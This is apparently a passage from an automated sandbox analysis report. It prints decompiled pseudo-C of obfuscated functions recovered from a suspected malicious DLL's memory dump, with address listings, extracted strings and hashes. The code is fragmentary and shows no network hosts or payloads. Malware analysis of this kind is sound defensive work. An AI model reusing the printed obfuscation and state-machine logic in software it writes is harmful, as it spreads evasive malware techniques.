						E02B4C9B0(_v28,  *((intOrPtr*)(_t238 + 0xc)) + _t233, _v4,  <  ?  *((void*)(_t238 + 8)) :  *((intOrPtr*)(_t238 + 0x10)),  *_t240 +  *((intOrPtr*)(_t238 + 0x14)), _v12);
						_t244 =  &(_t244[4]);
						_t238 = _t238 + 0x28;
					}
					goto L6;
				}
				return _t188;
			}

0x02b53268
0x02b5326c
0x02b53270
0x02b53272
0x02b53276
0x02b53277
0x02b53278
0x02b53279
0x02b5327e
0x02b53288
0x02b5328d
0x02b53298
0x02b5329d
0x02b532a3
0x02b532ab
0x02b532b3
0x02b532bf
0x02b532c4
0x02b532ca
0x02b532cf
0x02b532d7
0x02b532df
0x02b532e7
0x02b532ec
0x02b532f1
0x02b532f9
0x02b53305
0x02b5330a
0x02b53310
0x02b53318
0x02b5331d
0x02b53325
0x02b5332d
0x02b53335
0x02b5333a
0x02b53342
0x02b5334a
0x02b53352
0x02b5335a
0x02b5335f
0x02b53367
0x02b5336f
0x02b53377
0x02b5337f
0x02b53387
0x02b5338f
0x02b53397
0x02b5339f
0x02b533a7
0x02b533af
0x02b533b7
0x02b533bf
0x02b533cb
0x02b533ce
0x02b533d2
0x02b533da
0x02b533e2
0x02b533ea
0x02b533ee
0x02b533f6
0x02b533fe
0x02b5340b
0x02b53418
0x02b5341b
0x02b5341f
0x02b53427
0x02b53437
0x02b5343b
0x02b53443
0x02b5344b
0x02b53453
0x02b53460
0x02b53461
0x02b53465
0x02b5346d
0x02b53475
0x02b5347d
0x02b53485
0x02b53495
0x02b53499
0x02b534a1
0x02b534ad
0x02b534b1
0x02b534b6
0x02b534b8
0x02b534bd
0x02b534ea
0x02b534ec
0x02b534f1
0x02b53557
0x00000000
0x02b53559
0x02b53508
0x02b53511
0x02b5351b
0x02b53520
0x02b53552
0x02b5353a
0x02b53547
0x02b5354c
0x02b5354f
0x02b5354f
0x00000000
0x02b53556
0x02b5355f

Strings

'?9, xrefs: 02B5335F
_~W, xrefs: 02B5327E
vr, xrefs: 02B53453
Wqg, xrefs: 02B533AF
!, xrefs: 02B533B7
@, xrefs: 02B532F1
J, xrefs: 02B532CF
$P, xrefs: 02B534CB

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !$$P$'?9$@$Wqg$_~W$vr$J
API String ID: 0-3966742547
Opcode ID: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction ID: dac296066e405cc9df5c9238dad8b14f15044d360126f131d27c1e1119e5f21e
Opcode Fuzzy Hash: fef6665b2dcae0e8f76fd5e1b4eb73354bf8a0be14dccf9d357c285fbdd5a555
Instruction Fuzzy Hash: 44814172508340AFC358CF66C88991BBBF2FBC5758F00991DFA998A260D3B6D945CF06

Uniqueness

Uniqueness Score: -1.00%

Function 02B517BD, Relevance: 9.1, Strings: 7, Instructions: 356
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E02B517BD(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				void* _t369;
				void* _t397;
				intOrPtr _t400;
				intOrPtr _t402;
				void* _t412;
				intOrPtr _t415;
				intOrPtr _t419;
				void* _t425;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int* _t475;

				_push(_a8);
				_t462 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E02B4FE29(_t369);
				_v1576 = 0x13bb59;
				_t475 =  &(( &_v1728)[4]);
				_v1572 = 0x74d317;
				_v1568 = 0x8520ae;
				_t425 = 0xbbc45e7;
				_v1564 = 0;
				_v1636 = 0xff081c;
				_v1636 = _v1636 + 0xffff5aa8;
				_v1636 = _v1636 | 0xdf687e40;
				_v1636 = _v1636 ^ 0xdffe7eed;
				_v1592 = 0x1eb670;
				_t463 = 3;
				_v1592 = _v1592 / _t463;
				_v1592 = _v1592 ^ 0x000911f1;
				_v1588 = 0xd7f028;
				_v1588 = _v1588 + 0x99cf;
				_v1588 = _v1588 ^ 0x00d6a0ad;
				_v1668 = 0xda1be6;
				_v1668 = _v1668 >> 0xa;
				_v1668 = _v1668 + 0xb82c;
				_v1668 = _v1668 + 0xffff3cb9;
				_v1668 = _v1668 ^ 0x000447cb;
				_v1700 = 0x2ba1ed;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 + 0xffff6a87;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000ca1a2;
				_v1600 = 0xfc0906;
				_v1600 = _v1600 >> 0xe;
				_v1600 = _v1600 ^ 0x000a9240;
				_v1692 = 0xcdddf3;
				_v1692 = _v1692 | 0x4624ceaf;
				_v1692 = _v1692 >> 0xc;
				_v1692 = _v1692 | 0xae0b3fef;
				_v1692 = _v1692 ^ 0xae09d891;
				_v1652 = 0xd6e5ef;
				_v1652 = _v1652 + 0xffffecd6;
				_t464 = 0x1f;
				_v1652 = _v1652 * 0x1b;
				_v1652 = _v1652 ^ 0x16a7acad;
				_v1724 = 0x640b42;
				_v1724 = _v1724 + 0x7af0;
				_v1724 = _v1724 + 0xd7a0;
				_v1724 = _v1724 / _t464;
				_v1724 = _v1724 ^ 0x00003baa;
				_v1644 = 0x5d7e02;
				_v1644 = _v1644 ^ 0x280f1fa3;
				_v1644 = _v1644 | 0x80dcb776;
				_v1644 = _v1644 ^ 0xa8d7b48e;
				_v1612 = 0x310401;
				_v1612 = _v1612 << 0xc;
				_v1612 = _v1612 ^ 0x10456323;
				_v1708 = 0xec7d3e;
				_v1708 = _v1708 + 0xffff4756;
				_t465 = 0x19;
				_v1708 = _v1708 / _t465;
				_v1708 = _v1708 * 0x78;
				_v1708 = _v1708 ^ 0x04625198;
				_v1676 = 0xc1499c;
				_v1676 = _v1676 + 0x787f;
				_v1676 = _v1676 >> 7;
				_v1676 = _v1676 >> 0xd;
				_v1676 = _v1676 ^ 0x0006bbad;
				_v1620 = 0xc8864f;
				_v1620 = _v1620 + 0xdb64;
				_t466 = 0x71;
				_v1620 = _v1620 / _t466;
				_v1620 = _v1620 ^ 0x00054ec4;
				_v1716 = 0x58bfc6;
				_v1716 = _v1716 << 0xc;
				_v1716 = _v1716 << 6;
				_v1716 = _v1716 >> 0xa;
				_v1716 = _v1716 ^ 0x00309503;
				_v1584 = 0x2a66b4;
				_t467 = 0x6c;
				_v1584 = _v1584 * 0x62;
				_v1584 = _v1584 ^ 0x103c6d70;
				_v1628 = 0xcd0e9a;
				_v1628 = _v1628 + 0xffff6b98;
				_v1628 = _v1628 + 0xffffdc7c;
				_v1628 = _v1628 ^ 0x00cd4883;
				_v1684 = 0x7bfe73;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 << 7;
				_v1684 = _v1684 * 0x31;
				_v1684 = _v1684 ^ 0x5ee8daf9;
				_v1660 = 0x1f1c01;
				_v1660 = _v1660 >> 4;
				_v1660 = _v1660 / _t467;
				_v1660 = _v1660 ^ 0x000ccbd2;
				_v1720 = 0x840fb2;
				_v1720 = _v1720 | 0xa69eff81;
				_v1720 = _v1720 << 0xe;
				_v1720 = _v1720 + 0xffff3037;
				_v1720 = _v1720 ^ 0xbfecb97e;
				_v1656 = 0xd8a297;
				_v1656 = _v1656 + 0x41c1;
				_v1656 = _v1656 ^ 0x1d9d441b;
				_v1656 = _v1656 ^ 0x1d437da6;
				_v1580 = 0xe77586;
				_v1580 = _v1580 + 0xfffff7e8;
				_v1580 = _v1580 ^ 0x00e53b2f;
				_v1728 = 0x20c0e;
				_v1728 = _v1728 + 0x594f;
				_t468 = 0x79;
				_v1728 = _v1728 / _t468;
				_v1728 = _v1728 ^ 0x017ec3a2;
				_v1728 = _v1728 ^ 0x01734834;
				_v1712 = 0x467deb;
				_v1712 = _v1712 | 0xfb06902d;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 0xb;
				_v1712 = _v1712 ^ 0xef0dc14e;
				_v1632 = 0xa85c1c;
				_v1632 = _v1632 << 3;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x54293107;
				_v1596 = 0x697bfe;
				_v1596 = _v1596 | 0x748d72c7;
				_v1596 = _v1596 ^ 0x74e3de32;
				_v1640 = 0x724245;
				_t222 =  &_v1640; // 0x724245
				_v1640 =  *_t222 * 0x4c;
				_t224 =  &_v1640; // 0x724245
				_v1640 =  *_t224 * 0x26;
				_v1640 = _v1640 ^ 0x08f66fe6;
				_v1648 = 0xa241b2;
				_v1648 = _v1648 >> 4;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x890355d2;
				_v1604 = 0x4e61c6;
				_v1604 = _v1604 | 0x297abf50;
				_v1604 = _v1604 ^ 0x29742082;
				_v1608 = 0xdfdd08;
				_v1608 = _v1608 | 0x096e656f;
				_v1608 = _v1608 ^ 0x09fe8e74;
				_v1624 = 0x7e1789;
				_v1624 = _v1624 + 0xd6ac;
				_v1624 = _v1624 + 0xffff1ac7;
				_v1624 = _v1624 ^ 0x007fce14;
				_v1688 = 0xd4150c;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 ^ 0x561d7592;
				_v1688 = _v1688 >> 0xa;
				_v1688 = _v1688 ^ 0x001f305a;
				_v1696 = 0x3e923d;
				_v1696 = _v1696 ^ 0x624df4c6;
				_t469 = 0x29;
				_v1696 = _v1696 / _t469;
				_v1696 = _v1696 + 0xffffe680;
				_v1696 = _v1696 ^ 0x026755ff;
				_v1704 = 0xed73af;
				_t470 = 0x36;
				_v1704 = _v1704 / _t470;
				_v1704 = _v1704 * 0x76;
				_v1704 = _v1704 >> 3;
				_v1704 = _v1704 ^ 0x0041c6e0;
				_v1664 = 0xe0489c;
				_v1664 = _v1664 * 0x4e;
				_v1664 = _v1664 * 0x21;
				_v1664 = _v1664 << 0xf;
				_v1664 = _v1664 ^ 0x084e6c7b;
				_v1672 = 0xcef4bd;
				_v1672 = _v1672 * 0x4b;
				_v1672 = _v1672 + 0xffff3dcb;
				_v1672 = _v1672 << 0x10;
				_v1672 = _v1672 ^ 0xf1249f73;
				_v1680 = 0x187dc5;
				_v1680 = _v1680 | 0x94fddf65;
				_v1680 = _v1680 << 1;
				_v1680 = _v1680 ^ 0x244f0190;
				_v1680 = _v1680 ^ 0x0db75cb9;
				_v1616 = 0xe6e563;
				_v1616 = _v1616 ^ 0xa5d4beb7;
				_v1616 = _v1616 + 0xffffcebd;
				_v1616 = _v1616 ^ 0xa53dba5b;
				do {
					while(_t425 != 0x6a96cc9) {
						if(_t425 == 0xabcd6f9) {
							_push(_t425);
							__eflags = E02B485FF(_v1664, _v1672, __eflags, _t462,  &_v520, _t462, _v1680, _t462, _v1616);
							_t462 =  !=  ? 1 : _t462;
						} else {
							if(_t425 == 0xbbc45e7) {
								E02B31A34(_v1592,  &_v1040, _t425, _t425, _v1588, _v1668, _v1700, _t425, _v1636, _v1600);
								_t475 =  &(_t475[8]);
								_t425 = 0xe9b1f6b;
								continue;
							} else {
								_t482 = _t425 - 0xe9b1f6b;
								if(_t425 != 0xe9b1f6b) {
									goto L8;
								} else {
									_push(_v1644);
									_push(_v1724);
									_push(_v1652);
									_t412 = E02B4E1F8(0x2b31030, _v1692, _t482);
									E02B37078( &_v1560, _t482);
									_t415 =  *0x2b56214; // 0x0
									_t419 =  *0x2b56214; // 0x0
									E02B3F96F(_v1612, _t482, _t419 + 0x34, _t412,  &_v1560, _v1708,  &_v520, _t415 + 0x23c, _v1676, _v1620, _v1716,  &_v1040);
									E02B4FECB(_t412, _v1584, _v1628, _v1684, _v1660);
									_t475 =  &(_t475[0x10]);
									_t425 = 0xabcd6f9;
									continue;
								}
							}
						}
						L11:
						return _t462;
					}
					_push(_v1728);
					_t346 =  &_v1580; // 0xe53b2f
					_push( *_t346);
					_push(_v1656);
					_t397 = E02B4E1F8(0x2b310f0, _v1720, __eflags);
					E02B37078( &_v1560, __eflags);
					_t400 =  *0x2b56214; // 0x0
					_t402 =  *0x2b56214; // 0x0
					__eflags = _t402 + 0x23c;
					E02B3BF5F(_v1712, _t402 + 0x23c, _v1632,  &_v1560, _v1596,  &_v520, _v1640,  &_v1040, _t402 + 0x23c, _v1648, _t400 + 0x34, _v1604, _v1608,  &_v1560, _t462);
					E02B4FECB(_t397, _v1624, _v1688, _v1696, _v1704);
					_t475 =  &(_t475[0x13]);
					_t425 = 0xabcd6f9;
					L8:
					__eflags = _t425 - 0xcc0d361;
				} while (__eflags != 0);
				goto L11;
			}

0x02b517c7
0x02b517ce
0x02b517d0
0x02b517d7
0x02b517d8
0x02b517d9
0x02b517de
0x02b517e9
0x02b517ec
0x02b517f9
0x02b51804
0x02b51809
0x02b51810
0x02b51818
0x02b51820
0x02b51828
0x02b51830
0x02b51844
0x02b51849
0x02b51852
0x02b5185d
0x02b51868
0x02b51873
0x02b5187e
0x02b51886
0x02b5188b
0x02b51893
0x02b5189b
0x02b518a3
0x02b518ab
0x02b518b0
0x02b518b8
0x02b518bd
0x02b518c5
0x02b518d0
0x02b518d8
0x02b518e3
0x02b518eb
0x02b518f3
0x02b518f8
0x02b51900
0x02b51908
0x02b51910
0x02b5191d
0x02b51920
0x02b51924
0x02b5192c
0x02b51934
0x02b5193c
0x02b5194c
0x02b51950
0x02b51958
0x02b51960
0x02b51968
0x02b51970
0x02b51978
0x02b51983
0x02b5198b
0x02b51996
0x02b5199e
0x02b519aa
0x02b519ad
0x02b519b6
0x02b519ba
0x02b519c4
0x02b519cc
0x02b519d4
0x02b519d9
0x02b519de
0x02b519e6
0x02b519ee
0x02b519fc
0x02b51a01
0x02b51a0a
0x02b51a15
0x02b51a1d
0x02b51a22
0x02b51a27
0x02b51a2c
0x02b51a34
0x02b51a47
0x02b51a4a
0x02b51a51
0x02b51a5c
0x02b51a64
0x02b51a6c
0x02b51a74
0x02b51a7c
0x02b51a84
0x02b51a89
0x02b51a93
0x02b51a97
0x02b51a9f
0x02b51aa7
0x02b51ab4
0x02b51ab8
0x02b51ac0
0x02b51ac8
0x02b51ad0
0x02b51ad5
0x02b51add
0x02b51ae5
0x02b51aed
0x02b51af5
0x02b51afd
0x02b51b05
0x02b51b10
0x02b51b1b
0x02b51b26
0x02b51b2e
0x02b51b3a
0x02b51b3d
0x02b51b41
0x02b51b49
0x02b51b51
0x02b51b59
0x02b51b61
0x02b51b66
0x02b51b6b
0x02b51b73
0x02b51b7b
0x02b51b80
0x02b51b85
0x02b51b8d
0x02b51b98
0x02b51ba3
0x02b51bae
0x02b51bb6
0x02b51bbb
0x02b51bbf
0x02b51bc4
0x02b51bca
0x02b51bd7
0x02b51be4
0x02b51be9
0x02b51bee
0x02b51bf6
0x02b51c01
0x02b51c0c
0x02b51c17
0x02b51c22
0x02b51c2d
0x02b51c38
0x02b51c40
0x02b51c48
0x02b51c50
0x02b51c58
0x02b51c60
0x02b51c65
0x02b51c6d
0x02b51c72
0x02b51c7a
0x02b51c82
0x02b51c90
0x02b51c95
0x02b51c9b
0x02b51ca3
0x02b51cab
0x02b51cb7
0x02b51cba
0x02b51cc3
0x02b51cc7
0x02b51ccc
0x02b51cd4
0x02b51ce1
0x02b51cea
0x02b51cee
0x02b51cf3
0x02b51cfb
0x02b51d08
0x02b51d0c
0x02b51d14
0x02b51d19
0x02b51d21
0x02b51d29
0x02b51d31
0x02b51d35
0x02b51d3d
0x02b51d45
0x02b51d50
0x02b51d5b
0x02b51d66
0x02b51d71
0x02b51d71
0x02b51d7f
0x02b51f31
0x02b51f5b
0x02b51f5d
0x02b51d85
0x02b51d8b
0x02b51e67
0x02b51e6c
0x02b51e6f
0x00000000
0x02b51d91
0x02b51d91
0x02b51d93
0x00000000
0x02b51d99
0x02b51d99
0x02b51da2
0x02b51da6
0x02b51dae
0x02b51dbc
0x02b51ddd
0x02b51e03
0x02b51e0d
0x02b51e2d
0x02b51e32
0x02b51e35
0x00000000
0x02b51e35
0x02b51d93
0x02b51d8b
0x02b51f60
0x02b51f6c
0x02b51f6c
0x02b51e76
0x02b51e7f
0x02b51e7f
0x02b51e86
0x02b51e8e
0x02b51e9f
0x02b51ebb
0x02b51ec8
0x02b51ecd
0x02b51eff
0x02b51f19
0x02b51f1e
0x02b51f21
0x02b51f23
0x02b51f23
0x02b51f23
0x00000000

Strings

>}, xrefs: 02B51996
EBr, xrefs: 02B51BB6
OY, xrefs: 02B51B2E
}F, xrefs: 02B51B51
c, xrefs: 02B51D45
/;, xrefs: 02B51E7F
oen, xrefs: 02B51C22

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: /;$>}$EBr$OY$c$oen$}F
API String ID: 0-419207597
Opcode ID: 437e278c3734b1e2b2038dae4c3ef0b721b01b62c7de645461cdbf51882bea89
Instruction ID: 5017e1cb9a8a000d3606d39f1f307c55222e449a5682d2c5d19a03d73a3c91a9
Opcode Fuzzy Hash: 437e278c3734b1e2b2038dae4c3ef0b721b01b62c7de645461cdbf51882bea89
Instruction Fuzzy Hash: B40213B15083809FD365CF25C889A9FBBE6FBC4358F104A1DE2DA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B377A3, Relevance: 9.1, Strings: 7, Instructions: 330
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E02B377A3(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _t314;
				signed int _t352;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t370;
				signed int* _t401;
				signed int* _t405;
				void* _t407;

				_t402 = _a12;
				_push(_a12);
				_push(_a8);
				_t401 = __ecx;
				_push(_a4);
				_push(__ecx);
				E02B4FE29(_t314);
				_v100 = 0xaefbe1;
				_t405 =  &(( &_v192)[5]);
				_v100 = _v100 + 0x6b82;
				_t370 = 0xc5526f;
				_t362 = 0x2b;
				_v100 = _v100 / _t362;
				_v100 = _v100 ^ 0x00041443;
				_v80 = 0x1d3414;
				_v80 = _v80 + 0xffffdb02;
				_v80 = _v80 ^ 0x0011ba60;
				_v72 = 0x54a5f8;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x000d0ae3;
				_v136 = 0x274773;
				_t26 =  &_v136; // 0x274773
				_t363 = 0x1a;
				_v136 =  *_t26 * 0x4d;
				_v136 = _v136 + 0xffff9993;
				_v136 = _v136 ^ 0x0bd1637a;
				_v88 = 0xd58b4c;
				_v88 = _v88 + 0xffff1506;
				_v88 = _v88 ^ 0x00d01948;
				_v92 = 0x5e6930;
				_t38 =  &_v92; // 0x5e6930
				_v92 =  *_t38;
				_v92 = _v92 ^ 0x00540f59;
				_v116 = 0x40a51;
				_v116 = _v116 | 0x5ce3fa4e;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x1737f89e;
				_v108 = 0x7d5bec;
				_v108 = _v108 | 0x0f0c5889;
				_v108 = _v108 + 0xbcf5;
				_v108 = _v108 ^ 0x0f7d2458;
				_v164 = 0x3d5dd8;
				_v164 = _v164 ^ 0x644c870b;
				_v164 = _v164 >> 0xd;
				_v164 = _v164 * 0x7a;
				_v164 = _v164 ^ 0x017eec74;
				_v180 = 0x53df1b;
				_v180 = _v180 / _t363;
				_v180 = _v180 + 0xffff91ff;
				_v180 = _v180 + 0xffff90b6;
				_v180 = _v180 ^ 0x000d2df2;
				_v76 = 0x6cb33c;
				_v76 = _v76 + 0x7c19;
				_v76 = _v76 ^ 0x0065748e;
				_v160 = 0xaee8e0;
				_t364 = 0x3e;
				_v160 = _v160 / _t364;
				_v160 = _v160 + 0x21f3;
				_v160 = _v160 * 0x52;
				_v160 = _v160 ^ 0x00ffda9d;
				_v84 = 0xdaab99;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x000be4ff;
				_v144 = 0x6cc9e4;
				_v144 = _v144 >> 5;
				_v144 = _v144 ^ 0xa5290d0e;
				_v144 = _v144 ^ 0xa52e4d3d;
				_v120 = 0x3bbeb9;
				_v120 = _v120 ^ 0x393aef05;
				_v120 = _v120 + 0x22c7;
				_v120 = _v120 ^ 0x39070acc;
				_v148 = 0xc13163;
				_v148 = _v148 ^ 0x61e09c7e;
				_v148 = _v148 + 0x1cd6;
				_v148 = _v148 ^ 0x612c2d34;
				_v128 = 0x26c56f;
				_v128 = _v128 >> 2;
				_v128 = _v128 | 0xf6250b40;
				_v128 = _v128 ^ 0xf621b77e;
				_v176 = 0xf92ffc;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0x602a8fe3;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x00d9f38d;
				_v124 = 0x433c84;
				_v124 = _v124 + 0xffff4128;
				_v124 = _v124 ^ 0x1ed7562a;
				_v124 = _v124 ^ 0x1e92a094;
				_v132 = 0x6b8ec6;
				_v132 = _v132 ^ 0x28d18ae0;
				_t365 = 0x6a;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 ^ 0x9158c057;
				_v104 = 0x1fefeb;
				_v104 = _v104 >> 0xf;
				_v104 = _v104 + 0xffff5efe;
				_v104 = _v104 ^ 0xfff4cbde;
				_v168 = 0xc1bc7b;
				_v168 = _v168 >> 3;
				_v168 = _v168 << 7;
				_v168 = _v168 * 0x7d;
				_v168 = _v168 ^ 0xe998ae80;
				_v64 = 0x9d5223;
				_v64 = _v64 | 0x29ada36c;
				_v64 = _v64 ^ 0x29b66376;
				_v184 = 0x42d2c5;
				_v184 = _v184 + 0xffffd8f9;
				_v184 = _v184 | 0x10a03a14;
				_v184 = _v184 << 8;
				_v184 = _v184 ^ 0xe2b073c1;
				_v192 = 0xa502eb;
				_v192 = _v192 ^ 0xb81d0436;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 / _t365;
				_v192 = _v192 ^ 0x000463de;
				_v172 = 0x9c405d;
				_v172 = _v172 >> 6;
				_v172 = _v172 ^ 0x75940441;
				_v172 = _v172 + 0xd268;
				_v172 = _v172 ^ 0x759b0547;
				_v156 = 0x9f3fdd;
				_v156 = _v156 >> 3;
				_v156 = _v156 << 9;
				_v156 = _v156 >> 0xd;
				_v156 = _v156 ^ 0x000ada21;
				_v188 = 0xfbaf85;
				_v188 = _v188 | 0xf8737d3a;
				_t366 = 0x3c;
				_v188 = _v188 / _t366;
				_v188 = _v188 ^ 0x0422aead;
				_v112 = 0x7705bd;
				_v112 = _v112 | 0xb4ba0e14;
				_v112 = _v112 * 0x43;
				_v112 = _v112 ^ 0x5ec93514;
				_v96 = 0xe3e42a;
				_v96 = _v96 ^ 0x25c7ee45;
				_v96 = _v96 ^ 0x252c54ca;
				_v68 = 0xae646d;
				_v68 = _v68 + 0xcc0;
				_v68 = _v68 ^ 0x00a4113a;
				_v140 = 0x4c7529;
				_t367 = 0x73;
				_v140 = _v140 / _t367;
				_v140 = _v140 | 0x6ffaa740;
				_v140 = _v140 ^ 0x6ff9ac12;
				_v152 = 0xafca7f;
				_v152 = _v152 + 0xfffffd29;
				_v152 = _v152 + 0xad57;
				_v152 = _v152 + 0x26e2;
				_v152 = _v152 ^ 0x00ba4152;
				goto L1;
				do {
					while(1) {
						L1:
						_t407 = _t370 - 0x696b508;
						if(_t407 > 0) {
							break;
						}
						if(_t407 == 0) {
							_t401[1] = E02B3F369(_t402);
							_t370 = 0x4c1a8a5;
							continue;
						} else {
							if(_t370 == 0xc5526f) {
								_t370 = 0x696b508;
								 *_t401 =  *_t401 & 0x00000000;
								_t401[1] = _v100;
								continue;
							} else {
								if(_t370 == 0x1aa419f) {
									E02B40A90(_v64, _v184, _v192,  &_v60, _v172,  *((intOrPtr*)(_t402 + 0xc)));
									_t405 =  &(_t405[4]);
									_t370 = 0x68c33a9;
									continue;
								} else {
									if(_t370 == 0x4c1a8a5) {
										_push(_t370);
										_push(_t370);
										_t352 = E02B3C5D8(_t401[1]);
										_t405 =  &(_t405[3]);
										 *_t401 = _t352;
										__eflags = _t352;
										if(__eflags != 0) {
											_t370 = 0x8344534;
											continue;
										}
									} else {
										if(_t370 == 0x642ef10) {
											E02B4CAD5(_v108, _v164, __eflags, _v180, _t402 + 0x4c,  &_v60);
											_t405 =  &(_t405[3]);
											_t370 = 0x7d262d1;
											continue;
										} else {
											if(_t370 != 0x68c33a9) {
												goto L25;
											} else {
												E02B40A90(_v156, _v188, _v112,  &_v60, _v96,  *((intOrPtr*)(_t402 + 8)));
												_t405 =  &(_t405[4]);
												_t370 = 0x6a3d126;
												continue;
											}
										}
									}
								}
							}
						}
						goto L26;
					}
					__eflags = _t370 - 0x6a3d126;
					if(__eflags == 0) {
						E02B4CAD5(_v68, _v140, __eflags, _v152, _t402 + 0x2c,  &_v60);
						_t405 =  &(_t405[3]);
						_t370 = 0x2431b15;
						goto L25;
					} else {
						__eflags = _t370 - 0x7d262d1;
						if(_t370 == 0x7d262d1) {
							E02B40A90(_v76, _v160, _v84,  &_v60, _v144,  *((intOrPtr*)(_t402 + 0x58)));
							_t405 =  &(_t405[4]);
							_t370 = 0xabb5672;
							goto L1;
						} else {
							__eflags = _t370 - 0x8344534;
							if(_t370 == 0x8344534) {
								E02B322A6(_t401, _v92,  &_v60, _v116);
								_t405 =  &(_t405[2]);
								_t370 = 0x642ef10;
								goto L1;
							} else {
								__eflags = _t370 - 0x94f1f5a;
								if(_t370 == 0x94f1f5a) {
									E02B40A90(_v124, _v132, _v104,  &_v60, _v168,  *((intOrPtr*)(_t402 + 0x38)));
									_t405 =  &(_t405[4]);
									_t370 = 0x1aa419f;
									goto L1;
								} else {
									__eflags = _t370 - 0xabb5672;
									if(_t370 != 0xabb5672) {
										goto L25;
									} else {
										E02B40A90(_v120, _v148, _v128,  &_v60, _v176,  *((intOrPtr*)(_t402 + 0x10)));
										_t405 =  &(_t405[4]);
										_t370 = 0x94f1f5a;
										goto L1;
									}
								}
							}
						}
					}
					break;
					L25:
					__eflags = _t370 - 0x2431b15;
				} while (__eflags != 0);
				L26:
				__eflags =  *_t401;
				_t313 =  *_t401 != 0;
				__eflags = _t313;
				return 0 | _t313;
			}

0x02b377ac
0x02b377b4
0x02b377b5
0x02b377bc
0x02b377be
0x02b377c6
0x02b377c7
0x02b377cc
0x02b377d7
0x02b377da
0x02b377e8
0x02b377ef
0x02b377f4
0x02b377fa
0x02b37802
0x02b3780d
0x02b37818
0x02b37823
0x02b3782e
0x02b37836
0x02b37841
0x02b37849
0x02b3784e
0x02b37851
0x02b37855
0x02b3785d
0x02b37865
0x02b3786d
0x02b37875
0x02b3787d
0x02b37885
0x02b37889
0x02b3788d
0x02b37895
0x02b3789d
0x02b378a5
0x02b378aa
0x02b378b2
0x02b378ba
0x02b378c2
0x02b378ca
0x02b378d2
0x02b378da
0x02b378e2
0x02b378ec
0x02b378f0
0x02b378f8
0x02b37908
0x02b3790c
0x02b37914
0x02b3791c
0x02b37924
0x02b3792f
0x02b3793a
0x02b37945
0x02b37951
0x02b37954
0x02b37958
0x02b37965
0x02b37969
0x02b37971
0x02b37979
0x02b3797e
0x02b37988
0x02b37990
0x02b37995
0x02b3799d
0x02b379a5
0x02b379ad
0x02b379b5
0x02b379bd
0x02b379c5
0x02b379cd
0x02b379d5
0x02b379dd
0x02b379e5
0x02b379ed
0x02b379f2
0x02b379fa
0x02b37a02
0x02b37a0a
0x02b37a0f
0x02b37a17
0x02b37a1c
0x02b37a24
0x02b37a2c
0x02b37a34
0x02b37a3c
0x02b37a44
0x02b37a4c
0x02b37a5b
0x02b37a5e
0x02b37a62
0x02b37a6a
0x02b37a72
0x02b37a77
0x02b37a7f
0x02b37a87
